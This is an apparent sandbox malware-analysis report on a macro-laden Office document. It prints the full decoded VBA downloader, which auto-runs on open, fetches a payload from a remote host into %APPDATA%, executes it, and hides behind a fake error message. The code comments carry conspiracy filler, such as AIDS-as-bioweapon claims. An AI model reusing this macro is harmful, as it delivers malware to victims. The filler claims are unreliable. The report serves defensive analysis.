Verdict: MALICIOUS
Risk score: 334

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
The document body explicitly instructs the user to enable macros to view content, masquerading as a guide. Heuristics indicate the presence of VBA macros that utilize URLDownloadToFile, suggesting the script's intent is to download and execute a second-stage payload from a remote source. The AutoOpen macro marker further supports the automated execution of malicious code upon opening the document.
Heuristics (12)

- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal SxJGRjKiD As Long, ByVal YuhYFdBSh As String, ByVal jNje As String, ByVal ufc As Long, ByVal KC As Long) As Long`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Sub Workbook_Open()`
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Sub Auto_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `YTYTYTYTYTYTT = Environ("appdata") & "\"`
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.globaltax.mx/db/logo.gif (referenced by macro)
  - https://blu175.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=VoL5Z%2bfl%2bLLkwUjxLge0Y1IQDl8FQkwAvSV5mGR7ybM%3d0&url=http%3a%2f%2fapp.cfe.gob.mx%2faplicaciones%2fotros%2fConfirmacionAccesoServicios%2fImagenbit.aspx (referenced by macro)
  - http://ns.adobe.com/xap/1.0/ (referenced by macro)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (referenced by macro)
  - http://purl.org/dc/elements/1.1/ (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7965 bytes | 7f1ec7934358cd9ce31b3d70c5f1aaa8c112e0ced15ad71b8116b38a4ff93d5b |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'appointed Confederate Attorney General, later Secretary of War. American
Private Declare Function listen Lib "ws2_32" (ByVal s As Long, ByVal backlog As Integer) As Integer
Dim YTYTYTYTYTYTT As String
'became the head of one of the New York City blood bank. ( How does a
'agent Sergretti meets with FBI, Minutemen and others to plan kidnapping
Private Declare Function WSANtohl Lib "ws2_32" (ByVal hSocket As Long, ByVal lpNetLong As Long, lpHostLong As Long) As Integer
'Faces in the Crowd
Private Declare Function getsockopt Lib "ws2_32" (ByVal sck As Long, ByVal level As Long, ByVal optname As Long, ByVal optval As Long, optlen As Long) As Long
'hideout in Antarctica. Roosevelt sends Gen. »Wild Bill« Donovan on info-
'LBJ power to make war on Vietnam. Virginia Miller, later known as »Blue
Private Declare Function WSANtohs Lib "ws2_32" (ByVal hSocket As Long, ByVal lpNetShort As Integer, lpHostShort As Integer) As Integer
'born in Wayne County, New York, when the teenaged Fox sisters communica-
Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal uhQXseNh As Long, ByVal cwLKFWQ As Long, ByVal puhbwJx As Long, ByVal CsDrnv As Long, ByVal ckETWwDmfl As Long, ByVal bJaNlXW As Long) As Long
'The answers to this little mystery, Murder on the WHO Express will be quite
'1875 to 1947 — Life of Aleister Crowley, the Great Beast, Golden Dawn
Private Declare Function socket Lib "ws2_32" (ByVal iAddressFamily As Long, ByVal iType As Long, ByVal iProtocol As Long) As Long
'is murdered. Rex Heflin again visited by MIB in connection with his photos
Private Declare Function Connect Lib "ws2_32" (ByVal sck As Long, ByVal SckName As String, ByVal namelen As Long) As Long
'1937 - Spanish Civil War begins. First of 48 »Lost Colony« stones found
'who will presently remain anonymous.
Private Declare Function WSACleanup Lib "ws2_32" () As Integer
'QUELLENANHANC 69
'back of the Book Depository immediately after the assassination; Oswald
Private Declare Function WSAAsyncSelect Lib "ws2_32" (ByVal hSocket As Long, ByVal hWnd As Long, ByVal wMsg As Integer, ByVal lEvent As Long) As Integer
'witnessed ham radio operator establish contact with another world.
'Most people in there 40's are now carrying the virus through contaminated
Private Declare Function ntohl Lib "ws2_32" (ByVal netlong As Long) As Long
'secret police. CFR journal »Foreign Affairs« founded. King Tutankhamen's
'warfare center with the full blessing of the US government?
Private Declare Function WHGGHJHGJHJGetEvent Lib "ws2_32" (ByVal hEvent As Long) As Boolean
'organization. U.S. State Dept. creates Division of Special Research headed
Private Declare Function getpeername Lib "ws2_32" (ByVal sck As Long, name As Long, ByVal namelen As Long) As Long
'another attempt in Chicago also supposedly foiled. Attempted assassination
Private Declare Function GetSockName Lib "ws2_32" Alias "GetSockNameA" (ByVal sck As Long, name As Long, ByVal namelen As Long) As Long
'human totally psycho if he/she was not aware that
Private Declare Function inet_addr Lib "ws2_32" (ByVal cp As String) As Long
'and Bolivar die.
Private Declare Function WSAAsyncGetProtoByNumber Lib "ws2_32" (ByVal hWnd As Long, ByVal wMsg As Integer, ByVal iNumer As Integer, ByVal lpBuf As Long, ByVal BufLen As Long) As Long
'are approaching World War II mortality statistics here - without a shot being
'imprisoned in the Templars Temple tower. Massacres of September, in which
Private Declare Function closesocket Lib "ws2_32" (ByVal sck As Long) As Long
'CHINA WORK, WITH FULL PASSKEYS TO ALL THE LABORATORIES, THAN
Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal SxJGRjKiD As Long, ByVal YuhYFdBSh As String, ByVal jNje As String, ByVal ufc As Long, ByVal KC As Long) As Long
Sub Workbook_Open()
'1890 -- Biologist Yersin visits India, purportedly to recieve plague and cholera
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'with neglecting his health, died of cancer while awaiting retrial; David Ferrie,
'William Campbell Douglass, M.D.
'crash.
End Sub
Sub AutoOpen()
'and many of those directly involved in AIDS research, such as Robert Callo
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'William Campbell Douglass, M.D.
'using the cover of Harold Metcalf, of Drug Abuse Law Enforcement, who
End Sub
Sub Auto_Open()
'refugee leader Sylvio Odio is visited in Dallas by two Latins and »Leon Osward«
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Call JHHJKKJHHJKHJK
'the AIDS in those vaccinated. Dr. Robert Gallo, who has been mixed up
'TO DUPLICATE AND DISTRIBUTE THESE FILES PROFUSELY. THE MORE
End Sub
Public Function JHHJKKJHHJKHJK() As Variant
'1946 — Murder of wire service king James Ragen by Syndicate friends of
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
YTYTYTYTYTYTT = Environ("appdata") & "\"
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
HGGHJHGJHJG
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
MsgBox Chr(69) & "s" & "t" & Chr(101) & " " & "d" & Chr(111) & "c" & Chr(117) & "m" & "e" & Chr(110) & "t" & Chr(111) & " " & Chr(110) & Chr(111) & " " & Chr(101) & "s" & Chr(32) & Chr(99) & "o" & "m" & Chr(112) & "a" & Chr(116) & "i" & "b" & "l" & Chr(101) & Chr(32) & Chr(99) & "o" & "n" & " " & "e" & Chr(115) & Chr(116) & Chr(101) & Chr(32) & Chr(101) & "q" & "u" & Chr(105) & "p" & "o" & "." & vbCrLf & vbCrLf & Chr(80) & Chr(111) & Chr(114) & Chr(32) & "f" & "a" & "v" & "o" & Chr(114) & Chr(32) & "i" & Chr(110) & Chr(116) & "e" & Chr(110) & Chr(116) & Chr(101) & " " & "d" & Chr(101) & "s" & "d" & Chr(101) & " " & Chr(111) & "t" & Chr(114) & "o" & Chr(32) & Chr(101) & Chr(113) & "u" & Chr(105) & "p" & Chr(111) & ".", vbCritical, "E" & "q" & "u" & Chr(105) & Chr(112) & "o" & " " & "n" & Chr(111) & Chr(32) & "c" & "o" & Chr(109) & "p" & "a" & Chr(116) & "i" & Chr(98) & Chr(108) & Chr(101) 'Lancet. Their reply : » Thank you for that interesting letter on AIDS. I am
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
'planning to make Nixon a dictator. FBI begins secret Cointelpro campaign
Application.DisplayAlerts = False
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
'William Campbell Douglass, M.D.
Application.Quit
End Function
Public Function HGGHJHGJHJG(Optional OOIOIOIOIIO As String = "Deze website gebruikt cookies. Als u besluit door te gaan zonder de cookie instellingen van uw browser aan te passen, gaat u akkoord met ons ") As Variant
OOIOIOIOIIO = FRRFRFFRFR
URLDownloadToFileA 0&, "http://www.globaltax.mx/db/logo.gif", YTYTYTYTYTYTT & StrReverse(OOIOIOIOIIO), 0&, 0&
'plot to kill JFK). Ferrie allegedly flies to Dallas on evening after assassination
'QUELLENANHANC 87
'yes and the next it's no - depending upon what was served for lunch, or
ShellExecuteW 0&, StrPtr("Open"), StrPtr(YTYTYTYTYTYTT & StrReverse(OOIOIOIOIIO)), StrPtr(""), StrPtr(""), 1
'create a killer virus which was then used in a successful experiment in Africa.
End Function
Function FRRFRFFRFR() As String
FRRFRFFRFR = "ex" & "e.d" & "roW"
End Function
```